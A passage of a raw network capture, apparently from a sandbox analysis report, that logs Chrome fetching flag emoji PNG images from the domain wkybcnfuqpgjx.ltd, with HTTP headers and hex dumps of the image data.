                                  2025-01-12 00:04:00 UTC1369INData Raw: 71 ef 2f ec 2e 60 9f 80 02 9e 2c 28 86 29 b8 53 17 50 c8 14 26 b4 0d 7d 79 30 99 1b 00 01 61 7c 95 65 1b 6c 2a 90 c3 bb 47 0c 76 17 d0 20 0f 33 10 84 90 15 d2 86 62 65 80 3b 9e 3b ab af c8 fa 9e a6 e6 aa ce 40 74 00 17 76 26 16 70 64 0a 7f 37 65 3b 57 64 bc 70 07 68 70 af 6b b2 b1 23 77 da a6 7d fd f8 e3 cf bf 78 76 f2 d9 c9 c9 c9 a7 1f 3e e1 6f 62 cd 2e 34 8e aa 8d e3 ff e7 cc ec 4c 76 33 bb 49 cd 07 d9 a4 41 30 d0 d7 f8 be 50 7c f1 cd 5b 8d 20 56 44 c5 52 51 04 2b a2 a0 a8 18 2a f4 ca e8 85 82 17 5e 68 d1 0b a9 5e 59 ea 85 28 16 14 45 23 b6 5a f5 42 5a b5 0a b5 de 18 2b f1 a3 9b 34 b5 89 66 37 9b 66 76 e7 e3 1c bb bb 99 39 99 cc ce 4e ec 36 c9 0f 42 ce 09 99 ec 6f 9f 67 9e e7 9c 9c 59 c7 85 a4 da 47 04 78 75 df 12 b8 70 e9 0e e4 b2 42 e2 53 2c 04 64 cb
                                  Data Ascii: q/.`,()SP&}y0a|el*Gv 3be;;@tv&pd7e;Wdphpk#w}xv>ob.4Lv3IA0P|[ VDRQ+*^h^Y(E#ZBZ+4f7fv9N6BogYGxupBS,d
                                  2025-01-12 00:04:00 UTC1369INData Raw: 81 5d 2a 41 9e 34 0b ba 6f 5b ce 74 95 38 a2 b8 ad ff 2b b0 9a 00 23 a2 40 06 c5 9a 55 b1 5a 2e 68 f0 59 e8 6c 73 a1 a0 2e 3b f6 7c 5d 52 41 15 b9 d0 8b 7b b2 74 e9 57 12 6e b6 9f 97 87 7e 8e 62 a0 20 14 48 6a 63 17 5d 37 3f b0 f7 47 25 b2 7c 89 21 08 ad 4e 90 04 e2 48 cf a9 19 f8 14 db 0c 14 5a ca d2 ad 02 17 18 be 65 68 ff e7 44 51 7e f2 61 3c 89 a6 52 4c 08 c1 4b 73 ad f0 d1 8a 4a 5f 37 17 3f cb b3 40 ee ba 62 f0 ee d1 a1 83 1f 85 72 2f 23 47 cb 5d 03 49 6f 3a c5 b0 93 ce 74 86 43 1a a6 3a db e6 ae f9 42 56 77 f2 3f bd f7 26 f5 43 63 66 d8 8f f9 62 32 65 24 c8 f3 5c 6d 04 a9 f1 6f b8 25 a7 35 21 df a3 b6 58 48 5c 5e ea 1b 1e ec 6a 4f b6 77 0d 0c ef d8 f5 f4 c8 19 7c ff ee 8c 42 a0 0b 30 aa 00 f2 ed a4 26 81 e2 aa 38 de 59 0b ff d7 94 9e 3e d3 12 b8 b0
                                  Data Ascii: ]*A4o[t8+#@UZ.hYls.;|]RA{tWn~b Hjc]7?G%|!NHZehDQ~a<RLKsJ_7?@br/#G]Io:tC:BVw?&Ccfb2e$\mo%5!XH\^jOw|B0&8Y>
                                  2025-01-12 00:04:00 UTC225INData Raw: 0c cd 58 40 fb c5 77 9f fb fd 76 e7 bd e1 ce ac cf 2f 9f 9f 10 7c 90 6b 83 23 46 49 68 fa c5 b6 76 84 44 f7 77 07 56 14 35 29 32 0f fb dd cb b0 0b f8 ef 90 dd 16 c4 66 73 fe 6d 71 c4 20 09 42 20 23 78 87 81 30 2a b6 be 41 42 60 e3 7b c4 c3 dd ce 6f fb 88 ff 1d c2 75 ba 8b f3 cd 57 d9 11 88 6c 65 9f 74 28 09 4a d9 79 2b 28 c4 f7 c2 f6 65 d8 1b ee 07 c2 0d da cd 1b eb 55 92 84 65 81 a4 94 ac c8 c8 08 05 7b 1f bb 7e eb bd c7 7d 42 a7 db 5c 7b b6 6e 9e 66 33 18 32 c5 f6 83 7d 1f fa 2d 7c e8 23 ee 1f c2 14 b4 72 2d 5a 87 c6 35 e8 91 08 7d f0 3e a8 c7 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 ab c0 3f 8c 7a 2d 57 51 8d e8 7b 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: X@wv/|k#FIhvDwV5)2fsmq B #x0*AB`{ouWlet(Jy+(eUe{~}B\{nf32}-|#r-Z5}>?z-WQ{IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  94192.168.2.650007172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC370OUTGET /img-apple-160/1f1e6-1f1eb.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: image/png
                                  Content-Length: 4644
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1224"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sbCskcZAhUgxEO%2FjSBYKG3x9v%2Bg7bvQoXBYVCndkazC1CFync7mc4p6oTamgC53KtakSpLER0nUaDfbSxg%2Bg2Rsj6GnwihmKOaL6t%2BxFXW4mA4WUUq1PP5fk4u4EaIlmIigeQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e301ed95422f-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1709&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=948&delivery_rate=1634938&cwnd=137&unsent_bytes=0&cid=63c2be99f36f19d4&ts=366&x=0"
                                  2025-01-12 00:04:01 UTC470INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 47 24 0f 96 6f 69 71 57 4c 30 35 1e 63 9b 61 39 49 23 3d 1b 0d a3 6a 6a 62 9e 62 14 48 13 45 0e 0e 13 62 13 17 6f 17 04 04 04 61 61 61 04 48 04 b6 6c 6c 65 12 12 61 9c 61 01 01 01 0b 4f 0b 2c 2c 2c 09 07 07 b6 6d 6d 62 9c 62 63 63 63 67 12 13 07 49 07 05 07 07 b5 6c 6c 62 62 62 b7 6b 6c 67 13 13 07 07 07 b6 6c 6c 63 63 63 60 9c 60 0b 4f 0b 07 07 07 67 13 13 63 64 64 b5 6c 6c 06 06 06 4c 4c 4c 06 49 06 65 64 64 09 4e 08 5d 99 5d 65 a1 65 f7 eb e4 f2 ef d0 f4 e3 d4 ed e2 bf f4 d8 d7 eb d6 b4 f1 ce cc e9 cc ac ed c4 c1 e5 cb 9a e9 bc b6 e3 bd 98 dd bf 7f e9 af af de b9 88 e0 ad 8f d9 b5 75 e5 a4 a3 da af 78 e5 9b 9d d6 ac 66 d7
                                  Data Ascii: PNGIHDRPLTEGpLG$oiqWL05ca9I#=jjbbHEboaaaHlleaaO,,,mmbbcccgIllbbbklgllccc``OgcddllLLLIeddN]]eeuxf
                                  2025-01-12 00:04:01 UTC1369INData Raw: 04 84 04 4f 4f 4f c0 1e 1e 03 83 03 4e 4e 4e b5 22 21 c4 1b 1c bd 1e 1e bb 1d 1d 01 81 01 c6 16 21 00 80 00 00 7f 00 4b 4a 4a c0 17 1d c4 16 17 ac 20 20 01 7d 01 14 6f 14 b3 1c 1c 07 76 07 15 6c 15 af 1b 1b c0 12 17 a4 1d 1d 44 45 45 c3 0d 13 04 6d 04 0f 65 0f 98 1b 1b 40 3f 3f be 06 08 0f 5d 0e 8d 1a 1a 03 63 03 0d 59 0e 84 17 17 0d 53 0c 7e 16 16 03 56 03 79 16 16 3c 2e 2e fb f3 f3 30 30 30 70 14 14 69 12 12 02 48 02 29 28 28 2a 1a 1a 1e 1f 1f 24 16 16 1a 1a 1a 19 19 19 18 18 18 17 17 17 0e 1a 1a 15 15 15 1c 12 12 13 13 13 11 11 11 18 0e 0e 0f 0f 0f 0e 0e 0e 0c 0d 0d 0c 0c 0c 0a 0a 0a 08 08 08 07 07 07 05 05 05 04 04 04 02 02 02 01 01 01 00 00 00 3d 96 3b 3a 8b 3a 35 90 33 21 8f 21 03 82 03 46 91 45 c1 3c 3c 15 84 15 2e 9b 2e 06 85 06 b7 54 54 bd 46 46
                                  Data Ascii: OOONNN"!!KJJ }ovlDEEme@??]cYS~Vy<..000piH)((*$=;::53!!FE<<..TTFF
                                  2025-01-12 00:04:01 UTC1369INData Raw: ec 64 fd 3d 44 ca db 4f df f1 f9 8e 7d be ef 12 88 e2 ad b7 56 c6 df bc b9 52 fe 02 39 11 74 15 6f a0 78 fd f5 d7 1f 3e 7c f8 e3 9f fc e8 87 f0 5b 48 f8 6c a0 bd 8e 0d f0 c9 93 6b c0 77 ef dd df 00 4f ef bd f6 97 5b 03 7f 77 4e 44 ab fd e6 af 91 72 c5 fc f9 cf 90 74 45 45 c8 87 37 00 6f b6 a1 b0 2c 24 fc c6 57 9f 05 3c 7d 0f 78 ff ff 01 be 89 88 17 79 44 f1 22 e0 75 db 65 5c 03 7e 71 03 bc 7f fa 91 32 88 80 17 29 5c fb 36 c0 f5 33 78 b9 49 d0 4a 5e a3 7d 00 f8 e9 57 9f a0 5d 72 71 1a 23 e0 e3 75 06 51 0a 2f 81 8f 5e 16 f0 e1 15 e0 7c 8e 12 88 80 d7 6d 1b e0 d7 af 00 51 0a d7 c0 d3 15 f0 3b ef 01 ff f9 d1 80 6f 20 df 05 70 ed 9b 5f 02 ef 9c 5b 6c eb d6 c0 af 5c bc 11 a2 14 9e 27 10 01 ff fe b2 80 ab 5d 7c fc 60 03 bc 58 df 15 0f 42 00 6c e8 02 08 6c fb 16
                                  Data Ascii: d=DO}VR9tox>|[HlkwO[wNDrtEE7o,$W<}xyD"ue\~q2)\63xIJ^}W]rq#uQ/^|mQ;o p_[l\']|`XBll
                                  2025-01-12 00:04:01 UTC1369INData Raw: 86 f3 0c 0e 77 13 09 19 c5 12 04 96 7d 3c 2d 12 83 06 4d 70 5a 4a ed e7 76 89 a6 03 eb 14 c6 57 85 fc a1 7f f3 77 f1 f6 81 53 51 ac ee 31 b9 dc 4e 3b b0 6d 5f 5b 55 bc e0 90 33 76 53 89 28 2a 7f e5 29 2f d4 35 8e e6 87 4e 48 1f ee 0b 4f a5 c4 7e a0 56 29 05 da c7 81 10 4b a5 72 64 fa e2 7d 30 c9 b4 c9 f4 4e 72 bf d7 c8 d3 e3 e3 70 ae 3e 10 70 40 d1 55 ad 85 11 d5 3b 4e d0 48 c4 96 2b db ea 82 50 07 7e d0 3d ff 27 c7 e5 82 67 df 04 7c fc 71 00 0d 9e e6 55 95 25 44 35 90 56 98 6c b9 a7 eb 26 08 02 e8 ea a9 62 ee 9c 18 b7 5c eb 06 e0 95 fb c1 ed 00 4f 1e 54 29 81 68 55 59 b1 aa 91 e5 9e e9 06 b3 33 89 24 25 57 2f cd 34 9e 3a 34 f7 88 68 66 e4 4f 3e 00 dc b4 21 b6 0f 5c 78 43 96 16 f8 56 9f 4e 45 d2 bd c0 07 ee b8 67 4e 50 0e b3 8c 2b 14 39 75 50 17 b0 81 1f
                                  Data Ascii: w}<-MpZJvWwSQ1N;m_[U3vS(*)/5NHO~V)Krd}0Nrp>p@U;NH+P~='g|qU%D5Vl&b\OT)hUY3$%W/4:4hfO>!\xCVNEgNP+9uP
                                  2025-01-12 00:04:01 UTC67INData Raw: 0a 88 c6 92 98 b5 e3 d0 77 4c 0d ee da 56 93 55 4d d3 2d c7 f7 c3 38 8e c3 32 c7 d2 35 1c d9 b6 a3 28 8a a2 28 8a a2 28 8a a2 28 8a a2 a8 1f de 85 73 5a fe ed 1a cf 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: wLVUM-825((((sZIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  95192.168.2.650004172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC608OUTGET /img-apple-160/1f1e6-1f1ec.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC894INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:01 GMT
                                  Content-Type: image/png
                                  Content-Length: 5106
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-13f2"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bcbVmJSbgceMrWnWAARZEDm7QaLbCSAC8g30u4VDuWYG0qR8fgbTlKzuWhEhz2dpS0mSuFj5PxCyjHOuF0OxmZ%2BYH1m48SxI2cToBIzs2CjgKmheGHcxvIAxquJu3b279sA89g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e301faaeefa1-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1812&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1544156&cwnd=165&unsent_bytes=0&cid=e48c49c491d6a4f1&ts=857&x=0"
                                  2025-01-12 00:04:01 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 02 fd 50 4c 54 45 47 70 4c 69 44 47 63 4a 4c 61 2d 31 66 11 1a 67 67 67 65 11 1a 6b 69 69 60 1b 22 68 68 68 8b 20 2c 5c 10 18 63 63 63 62 19 21 61 61 61 63 15 1d 92 1f 2c 75 09 15 96 29 35 65 65 65 67 11 1a 69 69 69 4a 4b 4b 67 14 1d 64 64 64 69 69 69 65 12 1a 62 62 62 69 14 1d 2b 2e 2e 6a 6a 6a 68 14 1d 74 31 38 60 0c 15 ff ff ff fe fe fd fb ff ff fc fd fd fc fc fc fa fb fb f9 f9 f9 f5 f1 f1 e0 ef f6 ff fc 3a ec e4 e5 ff f2 37 f2 d5 d8 ff ec 38 ff e5 37 c3 dc f0 d4 d8 d8 ff e4 22 ff e0 35 ff dc 33 fd d9 37 fb d7 38 fa d6 37 f8 d4 35 ee bd c1 c8 c9 c9 f2 d0 36 d9 ce 55 ea ca 34 9e c8 e7 e4 c2 2f cb c4 57 b6 ba b9 da bb 31 de a0 a6 b2 be 6c ca ae 31 e1
                                  Data Ascii: PNGIHDRPLTEGpLiDGcJLa-1fgggekii`"hhh ,\cccb!aaac,u)5eeegiiiJKKgdddiiiebbbi+..jjjht18`:787"5378756U4/W1l1
                                  2025-01-12 00:04:01 UTC1369INData Raw: 2d 51 51 51 aa 28 36 da 14 1e bf 1e 2f b8 21 31 bb 1f 30 bd 1d 2e b3 21 30 ca 15 27 b8 1d 2d bc 1b 2c 4d 4d 4d aa 22 30 bc 19 2a b9 1a 2b 9e 26 33 55 4c 26 b9 18 29 b6 19 2a 49 49 49 b3 19 29 b6 17 28 14 56 87 b5 16 27 a3 1e 2c 9c 21 2e c7 0e 1f be 11 23 b3 16 26 46 46 46 b1 15 25 93 21 2d ab 16 26 b3 12 24 44 44 44 b0 13 24 b0 12 23 b2 11 22 42 42 42 ae 11 22 b0 10 21 a2 16 25 4a 42 26 8d 1f 2a ac 10 21 ae 0f 1f 40 40 40 aa 0f 1f 96 18 25 ac 0e 1e 11 4b 75 86 1e 29 a6 0f 1f 3c 3c 3c 9f 0e 1e 8d 16 23 7d 1c 26 96 0e 1c 38 38 38 85 15 21 91 0f 1c 3c 38 26 73 1a 24 17 3d 5b 34 34 34 6e 19 22 88 0c 18 81 0e 1b 31 30 2f 75 11 1c 6b 14 1d 2d 2d 2c 7a 0a 16 59 18 1f 75 0a 15 6e 0c 16 65 10 18 2a 2a 29 1a 2a 36 27 26 26 65 0a 13 24 24 24 5e 09 12 21 21 21 1f 1f
                                  Data Ascii: -QQQ(6/!10.!0'-,MMM"0*+&3UL&)*III)(V',!.#&FFF%!-&$DDD$#"BBB"!%JB&*!@@@%Ku)<<<#}&888!<8&s$=[444n"10/uk--,zYune**)*6'&&e$$$^!!!
                                  2025-01-12 00:04:01 UTC1369INData Raw: 0d fd c7 03 85 1a 05 48 cd 53 a3 c6 6a e8 e9 f3 3d b7 84 66 8f 0f 3c bd ff 2f d1 16 4c 1e 7e 7d 88 62 19 41 38 ff db 37 44 95 42 a8 a5 92 da d1 5a c1 7c 2d 80 26 9f f4 07 ea bb 1f 7d ec 7b 81 02 c4 59 9f 7a 15 1a d9 d3 af aa fc e6 08 50 a2 ff f1 fd b7 6f 8d e3 d5 2b ae 9d de 7f bd 14 4a b6 9c 20 2b 1e ef 13 5a 82 42 21 d2 5a 42 41 42 6b 00 ba c5 fa 4c 37 37 fe c8 c0 fb 7b 7f 77 8c a2 67 5f 85 79 75 37 ea db 7d 89 3b fd 01 94 dd f7 f8 0f 36 fd f5 24 da 80 e0 e4 7f 6d 08 57 58 b0 4a fb dc 47 d7 82 81 49 0a 0a 63 09 68 93 a3 41 a5 a7 01 46 9b 34 b5 55 31 7f e1 d9 df 2c ce 52 1c d4 56 ed 83 1d ec d4 28 d1 0e f7 94 5d d8 7d c4 fd 66 14 9f 4f b0 02 e7 f6 f5 b3 2c c1 94 91 23 7d 43 3a ed 3f 4e 15 a0 14 a0 a1 b9 d6 50 b1 27 93 58 80 e6 39 7e e9 b1 3d 42 d6 6b 60
                                  Data Ascii: HSj=f</L~}bA87DBZ|-&}{YzPo+J +ZB!ZBABkL77{wg_yu7};6$mWXJGIchAF4U1,RV(]}fO,#}C:?NP'X9~=Bk`
                                  2025-01-12 00:04:01 UTC1369INData Raw: c0 00 cc bc f6 dd 72 2d 72 36 5a 9c 16 6c e3 56 4e 0a 4d bb 82 9b f3 79 c9 56 25 98 c2 ed 17 fe a0 3f 4c 74 23 3f 08 66 50 7e e1 74 e4 f6 17 00 40 54 2a d0 44 a3 23 ea 76 de 92 6c f5 09 86 88 e9 bd f8 c2 2f 97 7b ca 00 ce e2 c2 64 7d 2a 04 70 45 ae 56 f1 e6 ff 8d d7 a9 5f bf 6b 29 8a 55 0a a6 44 1b 2a 7b 2f 22 48 ce d6 10 3c 42 b5 4c 35 a0 70 19 38 9a f9 1b 14 b0 76 82 88 9c 91 e2 99 3e b8 75 84 80 07 80 47 a0 b8 5c 3c ae 37 13 c9 d0 26 6d b5 14 59 79 51 47 1d 6b 82 14 db 65 00 ac a9 20 97 d6 88 5d 77 b1 16 f0 7c 6f 4d 59 6b 2c 08 22 73 05 77 06 6b 80 ed e7 07 b9 c6 5a 0b 82 b0 21 0b 01 56 4f ad 30 12 48 74 02 47 5b 28 32 72 9c 84 58 2d a4 b8 b1 26 6d ac 7d 82 40 20 b7 8b 08 ab 80 72 67 60 48 f2 5c 00 ac 47 82 b0 02 77 64 cc e7 e8 18 66 a1 80 5c 0e b5 b1
                                  Data Ascii: r-r6ZlVNMyV%?Lt#?fP~t@T*D#vl/{d}*pEV_k)UD*{/"H<BL5p8v>uG\<7&mYyQGke ]w|oMYk,"swkZ!VO0HtG[(2rX-&m}@ rg`H\Gwdf\
                                  2025-01-12 00:04:01 UTC524INData Raw: a6 22 49 6c 29 d9 4f e1 c0 33 86 b3 fc de 97 3f a2 2c 6e dd bb f2 91 f3 f9 58 2d 09 2d 56 62 80 68 d8 7d 1a 4d de 40 13 1b 0a 0c 14 35 78 83 22 4b 90 12 30 28 81 a6 65 5b b2 49 28 b2 9c 7f 70 cf a8 05 17 a8 0f 3f d4 37 b5 05 85 58 cd 4a 2b fe 2e c8 50 86 91 8c 34 d1 8d ae 25 d7 50 ca 38 65 4c 88 37 40 61 07 36 88 66 b6 1f b4 16 24 10 3a 68 16 4f 9f 25 93 24 e9 e3 28 bd 20 68 f1 62 74 01 bf ff f3 df 99 74 6d c0 be 6d c7 cc f6 44 2d 16 53 52 ca 40 46 5a 69 64 c1 b6 09 d7 12 3f 0c 60 81 00 56 d0 6a 85 59 fa 31 b4 af 03 09 09 05 5c 02 a0 14 3c 40 01 75 00 11 e0 21 ca 57 31 2f 18 34 cc d2 89 70 cd d4 77 ab 96 08 87 bf 52 49 62 db 15 06 be 2f b5 42 7b 10 c6 7b 9d 1f 04 08 25 7e bd d6 42 f0 30 10 a8 50 07 30 8e e5 86 96 8a 4f ac 22 5d db cc 16 cd 26 be 60 2a 0f
                                  Data Ascii: "Il)O3?,nX--Vbh}M@5x"K0(e[I(p?7XJ+.P4%P8eL7@a6f$:hO%$( hbttmmD-SR@FZid?`VjY1\<@u!W1/4pwRIb/B{{%~B0P0O"]&`*


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  96192.168.2.650008172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC370OUTGET /img-apple-160/1f1e6-1f1f1.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:01 UTC903INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: image/png
                                  Content-Length: 6110
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-17de"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOOSbX8ASQqK71BPbYa%2FJo8Oh4BEeFtpnscmJOIoeW9jI8kV%2Bqa5XdlJawG%2F4zC0wAXqjhJj5KwvvtMQia77TMT15JBOQ%2F2yRRDOKDchYhU%2BqrlP1%2F0Mk8tP31Ci9LVLPC3qIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e301fc6c435e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1847&min_rtt=1624&rtt_var=1055&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=856304&cwnd=240&unsent_bytes=0&cid=91317026bde1d7ee&ts=354&x=0"
                                  2025-01-12 00:04:01 UTC466INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 8c 43 47 68 1b 1f b3 6f 72 6a 1b 1f b0 6a 6e 67 19 1d 66 18 1b b7 74 77 67 1a 1d b5 72 76 66 18 1c 9e 4b 4f b1 6d 71 74 20 25 8c 28 2e b8 75 79 99 36 3b 67 18 1c b1 6c 70 67 19 1d 75 11 17 89 2f 33 67 18 1c b1 6e 71 bb 78 7b 61 13 17 99 49 4c 6e 20 24 60 13 17 b3 70 74 a8 5f 63 6c 1e 22 61 14 18 ba 76 79 68 1a 1e ad 6a 6e b8 74 78 67 19 1d b1 6e 71 68 1b 1e ba 77 7a 6c 1f 22 bc 78 7b ae 69 6c 6d 1f 23 60 13 16 9a 41 45 a8 5a 5d bb 69 6d c2 62 67 ff 47 51 ba 64 69 c5 5d 62 fc 44 4e c6 59 5e fb 41 4a aa 64 67 b9 5d 62 ca 55 5b b0 60 64 f1 43 4d ed 42 4b cc 50 56 a9 5f 62 e9 42 4b f2 3d 47 c1 52 58 ce 4c 52 b6 56 5b e9 3f 47 e4
                                  Data Ascii: PNGIHDRPLTEGpLCGhorjjngftwgrvfKOmqt %(.uy6;glpgu/3gnqx{aILn $`pt_cl"avyhjntxgnqhwzl"x{ilm#`AEZ]imbgGQdi]bDNY^AJdg]bU[`dCMBKPV_bBK=GRXLRV[?G
                                  2025-01-12 00:04:01 UTC1369INData Raw: 33 b7 2b 31 9c 36 3c bc 28 30 a4 31 37 bb 27 2e ab 2d 34 b8 27 2f b1 2a 31 b9 26 2d 94 36 3b b5 27 2e a8 2c 33 b8 24 2c b6 25 2c b8 24 2b ad 28 2f b6 23 2a 9a 2f 34 b1 24 2c b6 22 29 8e 33 38 b4 22 2a b2 22 29 b4 21 28 9c 2b 30 94 2d 32 88 32 37 b1 20 28 a3 26 2d b3 1f 27 aa 23 2a b1 1f 27 af 20 27 9a 29 2e 8f 2d 32 81 33 37 b2 1d 25 b0 1e 25 ae 1d 25 b0 1c 24 ab 1e 25 ad 1c 24 86 2d 31 ac 1c 24 ad 1b 21 a3 1f 26 aa 1c 23 ae 1a 22 7b 30 34 9e 20 26 8d 27 2d ac 19 21 94 23 29 aa 19 21 a6 1b 21 8b 26 2b 73 30 34 98 1e 24 85 26 2b 9f 19 20 93 1d 24 69 2f 32 73 2a 2e 7d 25 29 96 17 1d 8a 1c 22 61 2d 2f 91 17 1e 83 1d 23 76 22 26 65 27 2b 71 21 25 79 1d 22 59 2b 2d 89 14 1b 83 16 1c 6e 1e 22 50 2b 2d 7d 16 1c 6b 1b 1f 48 2a 2b 73 17 1c 7a 12 18 41 29 2a 4e 23
                                  Data Ascii: 3+16<(017'.-4'/*1&-6;'.,3$,%,$+(/#*/4$,")38"*")!(+0-227 (&-'#*' ').-237%%%$%$-1$!&#"{04 &'-!#)!!&+s04$&+ $i/2s*.}%)"a-/#v"&e'+q!%y"Y+-n"P+-}kH*+szA)*N#
                                  2025-01-12 00:04:01 UTC1369INData Raw: 26 52 c6 3e f8 e0 fd 0f d0 ca b9 97 9f fd fc 67 c3 bc 37 c8 df bf 37 f9 de e4 30 13 53 07 38 92 c4 e9 ac a0 69 00 00 2e 91 10 12 26 d0 91 ea 76 8d 9c 7f fe f2 e5 ab d7 3e bd f1 d9 e7 07 c0 ad 17 07 c0 7b 03 e0 1f 4f 02 fe c7 60 cd fc ed ad e5 e5 a5 c5 45 b4 5f be 1f 7b 7f 90 90 f9 65 26 18 0c 05 51 ce 05 cf ed 65 0a 05 3d 6d 34 e2 79 bd e8 5f 4b 37 20 28 d6 01 c8 c6 8a b5 18 8e 5a 42 4c 89 3d 5d bc c8 1e 06 fe 6e 0f f8 e2 25 e0 ef 4f 04 fe 60 d6 fd 0f 4f bf 46 c6 df fe fa d7 bf 58 46 41 1b e7 02 ca 9c 99 0b 7b 99 9d 9d 9d 99 99 99 9e 46 3c 2f 41 12 04 45 11 44 68 d2 3b e1 a5 b2 f2 0e 80 72 21 54 83 ad 6c 21 33 4e 8c 4f 78 6d 74 5d 57 7b 29 e6 e2 51 e0 13 04 fc ee 00 f8 f8 e1 bd db 6f 00 44 7d 47 c4 a7 4f bf 7e f8 f5 d7 77 ef a2 85 e9 37 bf fc 45 3f 1f 9b
                                  Data Ascii: &R>g770S8i.&v>{O`E_{e&Qe=m4y_K7 (ZBL=]n%O`OFXFA{F</AEDh;r!Tl!3NOxmt]W{)QoD}GO~w7E?
